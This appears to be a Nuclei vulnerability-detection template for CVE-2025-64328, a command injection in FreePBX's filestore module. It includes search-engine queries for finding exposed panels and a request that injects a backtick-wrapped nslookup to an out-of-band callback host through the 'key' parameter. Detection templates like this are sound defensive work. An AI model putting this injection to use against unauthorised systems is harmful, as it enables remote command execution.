id: CVE-2025-64328 info: name: FreePBX - Authenticated Command Injection in Administration panel author: _th3y severity: high description: | FreePBX 17 contains a command injection caused by insufficiently sanitized user-supplied data in the testconnection -> check_ssh_connect() function within the filestore module, allowing authenticated attackers execute arbitrary shell commands as the asterisk user. classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N cvss-score: 8.6 cve-id: CVE-2025-64328 cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:* reference: - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/ metadata: vendor: sangoma product: freepbx shodan-query: - http.title:"freepbx" - http.favicon.hash:"-1908328911" - http.favicon.hash:"1574423538" - http.title:"freepbx administration" fofa-query: - icon_hash="-1908328911" - icon_hash="1574423538" - title="freepbx administration" - title="freepbx" google-query: - intitle:"freepbx administration" - intitle:"freepbx" tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln variables: username: "{{username}}" password: "{{password}}" cmd: "nslookup {{interactsh-url}}" prefix: "{{rand_text_alpha(5)}}" flow: http(1) && http(2) http: - method: POST path: - "{{BaseURL}}/admin/config.php" headers: Content-Type: application/x-www-form-urlencoded body: "username={{username}}&password={{password}}" matchers: - type: word part: body words: - 'FreePBX Administration' - 'Hello, {{username}}' condition: and internal: true - method: GET path: - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}" headers: Referer: "{{BaseURL}}" matchers: - type: word part: interactsh_protocol words: - "dns" - "http"